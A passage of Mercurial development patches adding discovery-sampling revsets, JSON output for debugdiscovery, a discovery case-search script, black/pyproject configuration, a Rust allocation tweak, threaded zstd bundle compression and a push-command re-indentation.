heads.discard(p2) + children_count[p2] += 1 + + for h in heads: + assert children_count[h] == 0 + + selected = set() + for x in range(n): + if not heads: + break + pick = rand.choice(list(heads)) + heads.remove(pick) + assert pick not in selected + selected.add(pick) + p1, p2 = parents(pick) + if p1 in children_count: + assert p1 in children_count + children_count[p1] -= 1 + assert children_count[p1] >= 0 + if children_count[p1] == 0: + assert p1 not in selected, (r, p1) + heads.add(p1) + if p2 in children_count: + assert p2 in children_count + children_count[p2] -= 1 + assert children_count[p2] >= 0 + if children_count[p2] == 0: + assert p2 not in selected, (r, p2) + heads.add(p2) + + return smartset.baseset(selected) & subset # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615822631 -3600 # Mon Mar 15 16:37:11 2021 +0100 # Node ID 36b4640ccb6a8ecbee0a97d878a7f42b38e11f80 # Parent cb70dabe57189d796776e565e5b8f1e5c2cdd4a9 perf-helper: add a new sampling revset based on anti-chain See inline documentation for details. Differential Revision: https://phab.mercurial-scm.org/D10222 diff --git a/contrib/perf-utils/subsetmaker.py b/contrib/perf-utils/subsetmaker.py --- a/contrib/perf-utils/subsetmaker.py +++ b/contrib/perf-utils/subsetmaker.py @@ -92,3 +92,48 @@ heads.add(p2) return smartset.baseset(selected) & subset + + +@revsetpredicate(b'randomantichain(REVS, [seed])') +def antichain(repo, subset, x): + """Pick a random anti-chain in the repository + + A antichain is a set of changeset where there isn't any element that is + either a descendant or ancestors of any other element in the set. In other + word, all the elements are independant. It can be summarized with the + following algorithm:: + + selected = set() + unselected = repo.revs('all()') + while unselected: + pick = random.choice(unselected) + selected.add(pick) + unselected -= repo.revs('::<pick> + <pick>::') + """ + + args = revsetlang.getargs( + x, 1, 2, _(b"randomantichain expects revisions and an optional seed") + ) + if len(args) == 1: + (x,) = args + rand = random + elif len(args) == 2: + x, seed = args + seed = revsetlang.getinteger(seed, _(b"seed should be a number")) + rand = random.Random(seed) + else: + assert False + + selected = set() + + baseset = revset.getset(repo, smartset.fullreposet(repo), x) + undecided = baseset + + while undecided: + pick = rand.choice(list(undecided)) + selected.add(pick) + undecided = repo.revs( + '%ld and not (::%ld or %ld::head())', baseset, selected, selected + ) + + return smartset.baseset(selected) & subset # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615823703 -3600 # Mon Mar 15 16:55:03 2021 +0100 # Node ID 3a8cf5b9c8204aec5212d5aaf6263c66ce823a4b # Parent 36b4640ccb6a8ecbee0a97d878a7f42b38e11f80 debugdiscovery: add support for Json output They are some pre-output that will be impractical, I'll take care of it in the next changeset. Differential Revision: https://phab.mercurial-scm.org/D10223 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -998,7 +998,8 @@ 'use local as remote, with only these these revisions', ), ] - + cmdutil.remoteopts, + + cmdutil.remoteopts + + cmdutil.formatteropts, _(b'[--rev REV] [OTHER]'), ) def debugdiscovery(ui, repo, remoteurl=b"default", **opts): @@ -1140,50 +1141,42 @@ data[b'nb-ini_und-common'] = len(common_initial_undecided) data[b'nb-ini_und-missing'] = len(missing_initial_undecided) + fm = ui.formatter(b'debugdiscovery', opts) + fm.startitem() + fm.data(**pycompat.strkwargs(data)) # display discovery summary - ui.writenoi18n(b"elapsed time: %(elapsed)f seconds\n" % data) - ui.writenoi18n(b"round-trips: %(total-roundtrips)9d\n" % data) - ui.writenoi18n(b"heads summary:\n") - ui.writenoi18n(b" total common heads: %(nb-common-heads)9d\n" % data) - ui.writenoi18n( - b" also local heads: %(nb-common-heads-local)9d\n" % data - ) - ui.writenoi18n( - b" also remote heads: %(nb-common-heads-remote)9d\n" % data - ) - ui.writenoi18n(b" both: %(nb-common-heads-both)9d\n" % data) - ui.writenoi18n(b" local heads: %(nb-head-local)9d\n" % data) - ui.writenoi18n( - b" common: %(nb-common-heads-local)9d\n" % data - ) - ui.writenoi18n( - b" missing: %(nb-head-local-missing)9d\n" % data - ) - ui.writenoi18n(b" remote heads: %(nb-head-remote)9d\n" % data) - ui.writenoi18n( - b" common: %(nb-common-heads-remote)9d\n" % data - ) - ui.writenoi18n( - b" unknown: %(nb-head-remote-unknown)9d\n" % data - ) - ui.writenoi18n(b"local changesets: %(nb-revs)9d\n" % data) - ui.writenoi18n(b" common: %(nb-revs-common)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-common-heads)9d\n" % data) - ui.writenoi18n(b" roots: %(nb-common-roots)9d\n" % data) - ui.writenoi18n(b" missing: %(nb-revs-missing)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-missing-heads)9d\n" % data) - ui.writenoi18n(b" roots: %(nb-missing-roots)9d\n" % data) - ui.writenoi18n(b" first undecided set: %(nb-ini_und)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-ini_und-heads)9d\n" % data) - ui.writenoi18n(b" roots: %(nb-ini_und-roots)9d\n" % data) - ui.writenoi18n(b" common: %(nb-ini_und-common)9d\n" % data) - ui.writenoi18n(b" missing: %(nb-ini_und-missing)9d\n" % data) + fm.plain(b"elapsed time: %(elapsed)f seconds\n" % data) + fm.plain(b"round-trips: %(total-roundtrips)9d\n" % data) + fm.plain(b"heads summary:\n") + fm.plain(b" total common heads: %(nb-common-heads)9d\n" % data) + fm.plain(b" also local heads: %(nb-common-heads-local)9d\n" % data) + fm.plain(b" also remote heads: %(nb-common-heads-remote)9d\n" % data) + fm.plain(b" both: %(nb-common-heads-both)9d\n" % data) + fm.plain(b" local heads: %(nb-head-local)9d\n" % data) + fm.plain(b" common: %(nb-common-heads-local)9d\n" % data) + fm.plain(b" missing: %(nb-head-local-missing)9d\n" % data) + fm.plain(b" remote heads: %(nb-head-remote)9d\n" % data) + fm.plain(b" common: %(nb-common-heads-remote)9d\n" % data) + fm.plain(b" unknown: %(nb-head-remote-unknown)9d\n" % data) + fm.plain(b"local changesets: %(nb-revs)9d\n" % data) + fm.plain(b" common: %(nb-revs-common)9d\n" % data) + fm.plain(b" heads: %(nb-common-heads)9d\n" % data) + fm.plain(b" roots: %(nb-common-roots)9d\n" % data) + fm.plain(b" missing: %(nb-revs-missing)9d\n" % data) + fm.plain(b" heads: %(nb-missing-heads)9d\n" % data) + fm.plain(b" roots: %(nb-missing-roots)9d\n" % data) + fm.plain(b" first undecided set: %(nb-ini_und)9d\n" % data) + fm.plain(b" heads: %(nb-ini_und-heads)9d\n" % data) + fm.plain(b" roots: %(nb-ini_und-roots)9d\n" % data) + fm.plain(b" common: %(nb-ini_und-common)9d\n" % data) + fm.plain(b" missing: %(nb-ini_und-missing)9d\n" % data) if ui.verbose: - ui.writenoi18n( + fm.plain( b"common heads: %s\n" % b" ".join(sorted(short(n) for n in heads_common)) ) + fm.end() _chunksize = 4 << 10 diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -283,7 +283,7 @@ debugdate: extended debugdeltachain: changelog, manifest, dir, template debugdirstate: nodates, dates, datesort - debugdiscovery: old, nonheads, rev, seed, local-as-revs, remote-as-revs, ssh, remotecmd, insecure + debugdiscovery: old, nonheads, rev, seed, local-as-revs, remote-as-revs, ssh, remotecmd, insecure, template debugdownload: output debugextensions: template debugfileset: rev, all-files, show-matcher, show-stage diff --git a/tests/test-setdiscovery.t b/tests/test-setdiscovery.t --- a/tests/test-setdiscovery.t +++ b/tests/test-setdiscovery.t @@ -1724,3 +1724,45 @@ common: 300 missing: 100 common heads: 3ee37d65064a + +Test -T json output +------------------- + + $ hg -R a debugdiscovery \ + > -T json \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + query 1; heads + searching for changes + taking quick initial sample + query 2; still undecided: 375, sample size is: 81 + sampling from both directions + query 3; still undecided: 3, sample size is: 3 + 3 total queries in *s (glob) + [ + { + "elapsed": *, (glob) + "nb-common-heads": 1, + "nb-common-heads-both": 0, + "nb-common-heads-local": 0, + "nb-common-heads-remote": 0, + "nb-common-roots": 1, + "nb-head-local": 25, + "nb-head-local-missing": 25, + "nb-head-remote": 25, + "nb-head-remote-unknown": 25, + "nb-ini_und": 400, + "nb-ini_und-common": 300, + "nb-ini_und-heads": 25, + "nb-ini_und-missing": 100, + "nb-ini_und-roots": 1, + "nb-missing-heads": 25, + "nb-missing-roots": 25, + "nb-revs": 400, + "nb-revs-common": 300, + "nb-revs-missing": 100, + "total-roundtrips": 3 + } + ] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615824582 -3600 # Mon Mar 15 17:09:42 2021 +0100 # Node ID 67a2ecea8bd9dab2f28cb05b6c900de02eaf9837 # Parent 3a8cf5b9c8204aec5212d5aaf6263c66ce823a4b debugdiscovery: also integrate the discovery output in the json one We add a way for formatter to informs code that free output is unwanted, and we incorporate it in the json output. Differential Revision: https://phab.mercurial-scm.org/D10224 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -9,6 +9,7 @@ import codecs import collections +import contextlib import difflib import errno import glob @@ -1089,8 +1090,21 @@ remoterevs, _checkout = hg.addbranchrevs(repo, remote, branches, revs=None) localrevs = opts[b'rev'] - with util.timedcm('debug-discovery') as t: - common, hds = doit(localrevs, remoterevs) + + fm = ui.formatter(b'debugdiscovery', opts) + if fm.strict_format: + + @contextlib.contextmanager + def may_capture_output(): + ui.pushbuffer() + yield + data[b'output'] = ui.popbuffer() + + else: + may_capture_output = util.nullcontextmanager + with may_capture_output(): + with util.timedcm('debug-discovery') as t: + common, hds = doit(localrevs, remoterevs) # compute all statistics heads_common = set(common) @@ -1141,7 +1155,6 @@ data[b'nb-ini_und-common'] = len(common_initial_undecided) data[b'nb-ini_und-missing'] = len(missing_initial_undecided) - fm = ui.formatter(b'debugdiscovery', opts) fm.startitem() fm.data(**pycompat.strkwargs(data)) # display discovery summary diff --git a/mercurial/formatter.py b/mercurial/formatter.py --- a/mercurial/formatter.py +++ b/mercurial/formatter.py @@ -178,6 +178,11 @@ class baseformatter(object): + + # set to True if the formater output a strict format that does not support + # arbitrary output in the stream. + strict_format = False + def __init__(self, ui, topic, opts, converter): self._ui = ui self._topic = topic @@ -418,6 +423,9 @@ class jsonformatter(baseformatter): + + strict_format = True + def __init__(self, ui, out, topic, opts): baseformatter.__init__(self, ui, topic, opts, _nullconverter) self._out = out diff --git a/tests/test-setdiscovery.t b/tests/test-setdiscovery.t --- a/tests/test-setdiscovery.t +++ b/tests/test-setdiscovery.t @@ -1734,13 +1734,6 @@ > --local-as-revs 'first(heads(all()), 25)' \ > --remote-as-revs 'last(heads(all()), 25)' \ > --config devel.discovery.randomize=false - query 1; heads - searching for changes - taking quick initial sample - query 2; still undecided: 375, sample size is: 81 - sampling from both directions - query 3; still undecided: 3, sample size is: 3 - 3 total queries in *s (glob) [ { "elapsed": *, (glob) @@ -1763,6 +1756,7 @@ "nb-revs": 400, "nb-revs-common": 300, "nb-revs-missing": 100, + "output": "query 1; heads\nsearching for changes\ntaking quick initial sample\nquery 2; still undecided: 375, sample size is: 81\nsampling from both directions\nquery 3; still undecided: 3, sample size is: 3\n3 total queries in *s\n", (glob) "total-roundtrips": 3 } ] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615884061 -3600 # Tue Mar 16 09:41:01 2021 +0100 # Node ID b6ac612445e05909f0ca5542e08040b57e126c2a # Parent 67a2ecea8bd9dab2f28cb05b6c900de02eaf9837 debugdiscovery: add missing byte string marker to some help text This is causing crash when using --help. Differential Revision: https://phab.mercurial-scm.org/D10227 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -989,14 +989,14 @@ ( b'', b'local-as-revs', - "", - 'treat local has having these revisions only', + b"", + b'treat local has having these revisions only', ), ( b'', b'remote-as-revs', - "", - 'use local as remote, with only these these revisions', + b"", + b'use local as remote, with only these these revisions', ), ] + cmdutil.remoteopts # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615827702 -3600 # Mon Mar 15 18:01:42 2021 +0100 # Node ID 6b26e64325544f56d2089a7613e5be4ffb7318fc # Parent b6ac612445e05909f0ca5542e08040b57e126c2a perf-helpers: add a search-discovery-case script This a small script I built to look for interesting discovery case. It is fairly basic but could be useful in various situation so lets put it in the main repositories. Differential Revision: https://phab.mercurial-scm.org/D10225 diff --git a/contrib/perf-utils/search-discovery-case b/contrib/perf-utils/search-discovery-case new file mode 100755 --- /dev/null +++ b/contrib/perf-utils/search-discovery-case @@ -0,0 +1,198 @@ +#!/usr/bin/env python3 +# Search for interesting discovery instance +# +# search-discovery-case REPO [REPO]… +# +# This use a subsetmaker extension (next to this script) to generate a steam of +# random discovery instance. When interesting case are discovered, information +# about them are print on the stdout. +from __future__ import print_function + +import json +import os +import queue +import random +import signal +import subprocess +import sys +import threading + +this_script = os.path.abspath(sys.argv[0]) +this_dir = os.path.dirname(this_script) +hg_dir = os.path.join(this_dir, '..', '..') +HG_REPO = os.path.normpath(hg_dir) +HG_BIN = os.path.join(HG_REPO, 'hg') + +JOB = int(os.environ.get('NUMBER_OF_PROCESSORS', 8)) + + +SLICING = ('scratch', 'randomantichain', 'rev') + + +def nb_revs(repo_path): + cmd = [ + HG_BIN, + '--repository', + repo_path, + 'log', + '--template', + '{rev}', + '--rev', + 'tip', + ] + s = subprocess.Popen(cmd, stdout=subprocess.PIPE) + out, err = s.communicate() + return int(out) + + +repos = [] +for repo in sys.argv[1:]: + size = nb_revs(repo) + repos.append((repo, size)) + + +def pick_one(repo): + pick = random.choice(SLICING) + seed = random.randint(0, 100000) + if pick == 'scratch': + start = int(repo[1] * 0.3) + end = int(repo[1] * 0.7) + nb = random.randint(start, end) + return ('scratch', nb, seed) + elif pick == 'randomantichain': + return ('randomantichain', seed) + elif pick == 'rev': + start = int(repo[1] * 0.3) + end = int(repo[1]) + rev = random.randint(start, end) + return ('rev', rev) + else: + assert False + + +done = threading.Event() +cases = queue.Queue(maxsize=10 * JOB) +results = queue.Queue() + + +def worker(): + while not done.is_set(): + c = cases.get() + if c is None: + return + try: + res = process(c) + results.put((c, res)) + except Exception as exc: + print('processing-failed: %s %s' % (c, exc), file=sys.stderr) + c = (c[0], c[2], c[1]) + try: + res = process(c) + results.put((c, res)) + except Exception as exc: + print('processing-failed: %s %s' % (c, exc), file=sys.stderr) + + +SUBSET_PATH = os.path.join(HG_REPO, 'contrib', 'perf-utils', 'subsetmaker.py') + + +CMD_BASE = ( + HG_BIN, + 'debugdiscovery', + '--template', + 'json', + '--config', + 'extensions.subset=%s' % SUBSET_PATH, +) +# '--local-as-revs "$left" --local-as-revs "$right"' +# > /data/discovery-references/results/disco-mozilla-unified-$1-$2.txt +# ) + + +def to_revsets(case): + t = case[0] + if t == 'scratch': + return 'not scratch(all(), %d, "%d")' % (case[1], case[2]) + elif t == 'randomantichain': + return '::randomantichain(all(), "%d")' % case[1] + elif t == 'rev': + return '::%d' % case[1] + else: + assert False + + +def process(case): + (repo, left, right) = case + cmd = list(CMD_BASE) + cmd.append('-R') + cmd.append(repo[0]) + cmd.append('--local-as-revs') + cmd.append(to_revsets(left)) + cmd.append('--remote-as-revs') + cmd.append(to_revsets(right)) + s = subprocess.Popen(cmd, stdout=subprocess.PIPE) + out, err = s.communicate() + return json.loads(out)[0] + + +def interesting_boundary(res): + """check if a case is interesting or not + + For now we are mostly interrested in case were we do multiple roundstrip + and where the boundary is somewhere in the middle of the undecided set. + + Ideally, we would make this configurable, but this is not a focus for now + + return None or (round-trip, undecided-common, undecided-missing) + """ + roundtrips = res["total-roundtrips"] + if roundtrips <= 1: + return None + undecided_common = res["nb-ini_und-common"] + undecided_missing = res["nb-ini_und-missing"] + if undecided_common == 0: + return None + if undecided_missing == 0: + return None + return (roundtrips, undecided_common, undecided_missing) + + +def end(*args, **kwargs): + done.set() + + +def format_case(case): + return '-'.join(str(s) for s in case) + + +signal.signal(signal.SIGINT, end) + +for i in range(JOB): + threading.Thread(target=worker).start() + +nb_cases = 0 +while not done.is_set(): + repo = random.choice(repos) + left = pick_one(repo) + right = pick_one(repo) + cases.put((repo, left, right)) + while not results.empty(): + # results has a single reader so this is fine + c, res = results.get_nowait() + boundary = interesting_boundary(res) + if boundary is not None: + print(c[0][0], format_case(c[1]), format_case(c[2]), *boundary) + sys.stdout.flush() + + nb_cases += 1 + if not nb_cases % 100: + print('[%d cases generated]' % nb_cases, file=sys.stderr) + +for i in range(JOB): + try: + cases.put_nowait(None) + except queue.Full: + pass + +print('[%d cases generated]' % nb_cases, file=sys.stderr) +print('[ouput generation is over]' % nb_cases, file=sys.stderr) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615895543 -3600 # Tue Mar 16 12:52:23 2021 +0100 # Node ID 63a3941d9847e954c086ff349c4ba7ecc71cfad1 # Parent 6b26e64325544f56d2089a7613e5be4ffb7318fc perf-util: add an helper revset to use the same spec as the case search script This make result of the searcher script easier to use. Differential Revision: https://phab.mercurial-scm.org/D10228 diff --git a/contrib/perf-utils/subsetmaker.py b/contrib/perf-utils/subsetmaker.py --- a/contrib/perf-utils/subsetmaker.py +++ b/contrib/perf-utils/subsetmaker.py @@ -18,6 +18,37 @@ revsetpredicate = registrar.revsetpredicate() +@revsetpredicate(b'subsetspec("<spec>")') +def subsetmarkerspec(repo, subset, x): + """use a shorthand spec as used by search-discovery-case + + Supported format are: + + - "scratch-count-seed": not scratch(all(), count, "seed") + - "randomantichain-seed": ::randomantichain(all(), "seed") + - "rev-REV": "::REV" + """ + args = revsetlang.getargs( + x, 0, 1, _(b'subsetspec("spec") required an argument') + ) + + spec = revsetlang.getstring(args[0], _(b"spec should be a string")) + case = spec.split(b'-') + t = case[0] + if t == b'scratch': + spec_revset = b'not scratch(all(), %s, "%s")' % (case[1], case[2]) + elif t == b'randomantichain': + spec_revset = b'::randomantichain(all(), "%s")' % case[1] + elif t == b'rev': + spec_revset = b'::%d' % case[1] + else: + assert False, spec + + selected = repo.revs(spec_revset) + + return selected & subset + + @revsetpredicate(b'scratch(REVS, <count>, [seed])') def scratch(repo, subset, x): """randomly remove <count> revision from the repository top # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1606845124 18000 # Tue Dec 01 12:52:04 2020 -0500 # Node ID d13afdd1f6e25282f68a62c6ffa7b407a4ab2fec # Parent 63a3941d9847e954c086ff349c4ba7ecc71cfad1 pyproject: add config file This will tell pip et al to call our setup.py for the majority of packaging concerns, but also gives us a place to put standard config stuff like black. This was previously D9833, but was rolled back due to test breakage. nbjoerg thinks that breakage is now resolved, so we're trying again. Differential Revision: https://phab.mercurial-scm.org/D10184 diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,3 @@ +[build-system] +requires = ["setuptools", "wheel"] +build-backend = "setuptools.build_meta" diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -70,6 +70,7 @@ hg hgeditor hgweb.cgi + pyproject.toml rustfmt.toml setup.py # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1606845573 18000 # Tue Dec 01 12:59:33 2020 -0500 # Node ID decc3bd3f20d5628a0dd6c49394c00e51d1abe60 # Parent d13afdd1f6e25282f68a62c6ffa7b407a4ab2fec black: merge config into main pyproject.toml now that we have it This means that naive contributors who just run `black` on a source file will get reasonable behavior as long as they have a recent black. Yay! This was previously D9834 but was rolled back due to test failures. nbjoerg thinks it's time to try again, so let's give it a shot. Differential Revision: https://phab.mercurial-scm.org/D10185 diff --git a/black.toml b/black.toml deleted file mode 100644 --- a/black.toml +++ /dev/null @@ -1,14 +0,0 @@ -[tool.black] -line-length = 80 -exclude = ''' -build/ -| wheelhouse/ -| dist/ -| packages/ -| \.hg/ -| \.mypy_cache/ -| \.venv/ -| mercurial/thirdparty/ -''' -skip-string-normalization = true -quiet = true diff --git a/contrib/examples/fix.hgrc b/contrib/examples/fix.hgrc --- a/contrib/examples/fix.hgrc +++ b/contrib/examples/fix.hgrc @@ -5,7 +5,7 @@ rustfmt:command = rustfmt +nightly rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**" -black:command = black --config=black.toml - +black:command = black black:pattern = set:**.py - mercurial/thirdparty/** # Mercurial doesn't have any Go code, but if we did this is how we diff --git a/pyproject.toml b/pyproject.toml --- a/pyproject.toml +++ b/pyproject.toml @@ -1,3 +1,18 @@ [build-system] requires = ["setuptools", "wheel"] build-backend = "setuptools.build_meta" + +[tool.black] +line-length = 80 +exclude = ''' +build/ +| wheelhouse/ +| dist/ +| packages/ +| \.hg/ +| \.mypy_cache/ +| \.venv/ +| mercurial/thirdparty/ +''' +skip-string-normalization = true +quiet = true diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -66,7 +66,6 @@ COPYING Makefile README.rst - black.toml hg hgeditor hgweb.cgi diff --git a/tests/test-check-format.t b/tests/test-check-format.t --- a/tests/test-check-format.t +++ b/tests/test-check-format.t @@ -1,5 +1,5 @@ #require black test-repo $ cd $RUNTESTDIR/.. - $ black --config=black.toml --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` + $ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615622343 -3600 # Sat Mar 13 08:59:03 2021 +0100 # Node ID c94fa884240bb084f7ff23b55973b0a4c5c9b65f # Parent decc3bd3f20d5628a0dd6c49394c00e51d1abe60 rust: Preallocate the returned `Vec` in `utils::files::relativize_path` Profiling `rhg files > /dev/null` on an old snapshot of mozilla-central (with `perf` and the Firefox Profiler: https://github.com/firefox-devtools/profiler/blob/main/docs-user/guide-perf-profiling.md) showed non-trivial time spend in this function and in `realloc`. This change makes the wall-clock time for that process on my machine go from ~190 ms to ~150 ms. Differential Revision: https://phab.mercurial-scm.org/D10199 diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -290,7 +290,13 @@ if cwd.as_ref().is_empty() { Cow::Borrowed(path.as_bytes()) } else { - let mut res: Vec<u8> = Vec::new(); + // This is not all accurate as to how large `res` will actually be, but + // profiling `rhg files` on a large-ish repo shows it’s better than + // starting from a zero-capacity `Vec` and letting `extend` reallocate + // repeatedly. + let guesstimate = path.as_bytes().len(); + + let mut res: Vec<u8> = Vec::with_capacity(guesstimate); let mut path_iter = path.as_bytes().split(|b| *b == b'/').peekable(); let mut cwd_iter = cwd.as_ref().as_bytes().split(|b| *b == b'/').peekable(); # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1604863029 -3600 # Sun Nov 08 20:17:09 2020 +0100 # Node ID 471cd86c8eb4ec611ed89ad570b7219e2611b3eb # Parent c94fa884240bb084f7ff23b55973b0a4c5c9b65f bundle: optional multithreaded compression, ATM zstd-only Compression type can be a huge chunk of "hg bundle", especially when using the higher compression levels. With level=22 and threads=7, the NetBSD test repository took 28:39 wall time and 157:47 user time. Before, level=22 would take 129:20 wall time and 129:07 user time. Differential Revision: https://phab.mercurial-scm.org/D9283 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1648,6 +1648,14 @@ if complevel is not None: compopts[b'level'] = complevel + compthreads = ui.configint( + b'experimental', b'bundlecompthreads.' + bundlespec.compression + ) + if compthreads is None: + compthreads = ui.configint(b'experimental', b'bundlecompthreads') + if compthreads is not None: + compopts[b'threads'] = compthreads + # Bundling of obsmarker and phases is optional as not all clients # support the necessary features. cfg = ui.configbool diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -866,6 +866,31 @@ ) coreconfigitem( b'experimental', + b'bundlecompthreads', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.bzip2', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.gzip', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.none', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.zstd', + default=None, +) +coreconfigitem( + b'experimental', b'changegroup3', default=False, ) diff --git a/mercurial/utils/compression.py b/mercurial/utils/compression.py --- a/mercurial/utils/compression.py +++ b/mercurial/utils/compression.py @@ -685,9 +685,11 @@ # while providing no worse compression. It strikes a good balance # between speed and compression. level = opts.get(b'level', 3) + # default to single-threaded compression + threads = opts.get(b'threads', 0) zstd = self._module - z = zstd.ZstdCompressor(level=level).compressobj() + z = zstd.ZstdCompressor(level=level, threads=threads).compressobj() for chunk in it: data = z.compress(chunk) if data: diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -5,6 +5,11 @@ * The `rev-branch-cache` is now updated incrementally whenever changesets are added. + * The new options `experimental.bundlecompthreads` and + `experimental.bundlecompthreads.<engine>` can be used to instruct + the compression engines for bundle operations to use multiple threads + for compression. The default is single threaded operation. Currently + only supported for zstd. == New Experimental Features == diff --git a/tests/test-bundle-type.t b/tests/test-bundle-type.t --- a/tests/test-bundle-type.t +++ b/tests/test-bundle-type.t @@ -201,6 +201,15 @@ (see 'hg help bundlespec' for supported values for --type) [10] +zstd supports threading + + $ hg init test-compthreads + $ cd test-compthreads + $ hg debugbuilddag +3 + $ hg --config experimental.bundlecompthreads=1 bundle -a -t zstd-v2 zstd-v2-threaded.hg + 3 changesets found + $ cd .. + #else zstd is a valid engine but isn't available # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615990845 -3600 # Wed Mar 17 15:20:45 2021 +0100 # Node ID 25850879a215ee9cb8beea17eaddbfd737058837 # Parent 471cd86c8eb4ec611ed89ad570b7219e2611b3eb push: indent the some part of the command That code will be put in a loop in the next changeset, pre-indenting make the next change clearer. Differential Revision: https://phab.mercurial-scm.org/D10160 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5706,80 +5706,84 @@ # if we try to push a deleted bookmark, translate it to null # this lets simultaneous -r, -b options continue working opts.setdefault(b'rev', []).append(b"null") - - path = ui.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.ConfigError( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - dest = path.pushloc or path.loc - branches = (path.branch, opts.get(b'branch') or []) - ui.status(_(b'pushing to %s\n') % util.hidepassword(dest)) - revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev')) - other = hg.peer(repo, opts, dest) - - try: - if revs: - revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] - if not revs: - raise error.InputError( - _(b"specified revisions evaluate to an empty set"), - hint=_(b"use different revision arguments"), - ) - elif path.pushrev: - # It doesn't make any sense to specify ancestor revisions. So limit - # to DAG heads to make discovery simpler. - expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) - revs = scmutil.revrange(repo, [expr]) - revs = [repo[rev].node() for rev in revs] - if not revs: - raise error.InputError( - _(b'default push revset for path evaluates to an empty set') - ) - elif ui.configbool(b'commands', b'push.require-revs'): - raise error.InputError( - _(b'no revisions specified to push'), - hint=_(b'did you mean "hg push -r ."?'), + if True: + path = ui.getpath(dest, default=(b'default-push', b'default')) + if not path: + raise error.ConfigError( + _(b'default repository not configured!'), + hint=_(b"see 'hg help config.paths'"), ) - - repo._subtoppath = dest + dest = path.pushloc or path.loc + branches = (path.branch, opts.get(b'branch') or []) + ui.status(_(b'pushing to %s\n') % util.hidepassword(dest)) + revs, checkout = hg.addbranchrevs( + repo, repo, branches, opts.get(b'rev') + ) + other = hg.peer(repo, opts, dest) + try: - # push subrepos depth-first for coherent ordering - c = repo[b'.'] - subs = c.substate # only repos that are committed - for s in sorted(subs): - result = c.sub(s).push(opts) - if result == 0: - return not result + if revs: + revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] + if not revs: + raise error.InputError( + _(b"specified revisions evaluate to an empty set"), + hint=_(b"use different revision arguments"), + ) + elif path.pushrev: + # It doesn't make any sense to specify ancestor revisions. So limit + # to DAG heads to make discovery simpler. + expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) + revs = scmutil.revrange(repo, [expr]) + revs = [repo[rev].node() for rev in revs] + if not revs: + raise error.InputError( + _( + b'default push revset for path evaluates to an empty set' + ) + ) + elif ui.configbool(b'commands', b'push.require-revs'): + raise error.InputError( + _(b'no revisions specified to push'), + hint=_(b'did you mean "hg push -r ."?'), + ) + + repo._subtoppath = dest + try: + # push subrepos depth-first for coherent ordering + c = repo[b'.'] + subs = c.substate # only repos that are committed + for s in sorted(subs): + result = c.sub(s).push(opts) + if result == 0: + return not result + finally: + del repo._subtoppath + + opargs = dict( + opts.get(b'opargs', {}) + ) # copy opargs since we may mutate it + opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) + + pushop = exchange.push( + repo, + other, + opts.get(b'force'), + revs=revs, + newbranch=opts.get(b'new_branch'), + bookmarks=opts.get(b'bookmark', ()), + publish=opts.get(b'publish'), + opargs=opargs, + ) + + result = not pushop.cgresult + + if pushop.bkresult is not None: + if pushop.bkresult == 2: + result = 2 + elif not result and pushop.bkresult: + result = 2 finally: - del repo._subtoppath - - opargs = dict( - opts.get(b'opargs', {}) - ) # copy opargs since we may mutate it - opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) - - pushop = exchange.push( - repo, - other, - 